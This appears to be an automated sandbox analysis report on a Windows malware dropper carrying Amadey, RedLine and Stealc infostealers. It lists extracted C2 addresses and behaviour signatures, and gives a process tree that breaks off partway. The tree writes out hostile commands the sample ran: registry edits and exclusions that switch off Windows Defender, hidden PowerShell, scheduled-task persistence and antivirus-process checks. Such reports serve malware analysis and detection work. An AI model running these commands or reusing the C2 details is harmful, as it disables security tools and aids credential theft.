Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    302s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7059a1a683e7ed041174ecba67b4391ce48ef6081e0274dab604df701ed67188.exe

  • Size

    1.8MB

  • MD5

    f3f88a14e6e5081e102a150fca8d757f

  • SHA1

    3b98fc7ad8e6e13206a744964c1550ca32f397e2

  • SHA256

    7059a1a683e7ed041174ecba67b4391ce48ef6081e0274dab604df701ed67188

  • SHA512

    446bb3d54d0ec2e3fab690cfa042c5b5c02012d04167c56c1c8d312297ba7c0bc00fbf31c6840bc1a778ca5a4e697eb6ee89ec67f4a2d5f7e8ff955ec7cf9559

  • SSDEEP

    24576:2vXHanya2qCdIc9L8kSvefSQgsnBy5vaHvCVX0Cjy3ooNrH7VJZF0obXYrjFf3:SHanyashakMODA5vf0I+oqUQYrZf3

Score
10/10
amadeyredlinestealc@oleh_pspbundledefaultdefault2fed3aalivetraffictg cloud @rlreborn admin @fatherofcarderscredential_accessdefense_evasiondiscoveryevasionexecutioninfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
    evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
    evasiontrojan
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 6 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 9 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 44 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Indirect Command Execution 1 TTPs 37 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 39 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 34 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Drops file in Windows directory 13 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 36 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\7059a1a683e7ed041174ecba67b4391ce48ef6081e0274dab604df701ed67188.exe
        "C:\Users\Admin\AppData\Local\Temp\7059a1a683e7ed041174ecba67b4391ce48ef6081e0274dab604df701ed67188.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2532
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2928
            • C:\Users\Admin\AppData\Roaming\ekysWwzgo0.exe
              "C:\Users\Admin\AppData\Roaming\ekysWwzgo0.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
            • C:\Users\Admin\AppData\Roaming\F6h1imNrqF.exe
              "C:\Users\Admin\AppData\Roaming\F6h1imNrqF.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1084
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1272
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2172
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2316
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:3628
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2012
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Blocklisted process makes network request
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1824
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1272
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              PID:3000
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1276
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
            • C:\Users\Admin\AppData\Local\Temp\filename.exe
              "C:\Users\Admin\AppData\Local\Temp\filename.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2964
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                6⤵
                  PID:3940
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "filename.exe" /f
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4040
            • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
              "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2708
            • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:776
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:2512
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                • Loads dropped DLL
                PID:2340
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2068
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa opssvc"
                  6⤵
                    PID:1876
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1104
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    6⤵
                      PID:3052
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 607698
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2288
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "MaskBathroomCompositionInjection" Participants
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:1820
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                      6⤵
                        PID:2864
                      • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                        Waters.pif Q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2700
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        6⤵
                          PID:1760
                    • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2384
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3020
                    • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2468
                      • C:\Users\Admin\AppData\Local\Temp\7zS3E86.tmp\Install.exe
                        .\Install.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2280
                        • C:\Users\Admin\AppData\Local\Temp\7zS402C.tmp\Install.exe
                          .\Install.exe /RNXdidDHt "385121" /S
                          6⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates system info in registry
                          PID:1820
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            7⤵
                              PID:1604
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2356
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1824
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    10⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1480
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2076
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  9⤵
                                    PID:2180
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1648
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:628
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    9⤵
                                      PID:688
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        10⤵
                                          PID:1600
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:1004
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        9⤵
                                          PID:1524
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            10⤵
                                              PID:448
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          8⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:2092
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2136
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              10⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2660
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                11⤵
                                                  PID:2896
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                          7⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:2120
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            8⤵
                                              PID:1564
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2680
                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  10⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1612
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\dKnaNgr.exe\" PV /jyMxdidwiYr 385121 /S" /V1 /F
                                            7⤵
                                            • Drops file in Windows directory
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1720
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 556
                                            7⤵
                                            • Program crash
                                            PID:812
                                    • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                      4⤵
                                      • Drops startup file
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1532
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3040
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2640
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:592
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2012
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                        5⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3496
                                      • C:\Users\Admin\AppData\Local\Temp\fulcpd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\fulcpd.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:2460
                                      • C:\Users\Admin\AppData\Local\Temp\fkzyel.exe
                                        "C:\Users\Admin\AppData\Local\Temp\fkzyel.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:952
                                      • C:\Users\Admin\AppData\Local\Temp\xkeazs.exe
                                        "C:\Users\Admin\AppData\Local\Temp\xkeazs.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:3524
                                    • C:\Users\Admin\AppData\Local\Temp\1000308001\beb9ba37a5.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000308001\beb9ba37a5.exe"
                                      4⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Loads dropped DLL
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Checks processor information in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:964
                                    • C:\Users\Admin\AppData\Local\Temp\1000309001\5b283fc3bf.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000309001\5b283fc3bf.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:1000
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                        5⤵
                                          PID:2548
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                            6⤵
                                            • Checks processor information in registry
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:1756
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.0.1467583065\276894389" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93e9c15b-3ea2-44db-97ba-5daf961303ea} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 1340 4204458 gpu
                                              7⤵
                                                PID:2184
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1756.1.730426657\1264548931" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d82b96d8-7650-4dc3-aa35-38c57a575117} 1756 "\\.\pipe\gecko-crash-server-pipe.1756" 1552 f4ee558 socket
                                                7⤵
                                                  PID:1192
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
